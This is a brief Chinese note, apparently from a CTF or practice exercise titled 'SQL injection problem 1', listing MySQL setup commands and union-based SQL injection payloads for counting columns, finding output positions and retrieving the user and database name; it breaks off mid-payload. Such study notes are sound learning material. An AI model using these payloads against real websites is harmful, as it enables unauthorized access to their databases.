SQL注入题1

service mysql start; mysql -u root -q; use mysql; show databases; id=1 order by 3 判断列数 id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,user(),database() 查询数据库名id=-1 union select 1,(select table_n
相关文章
相关标签/搜索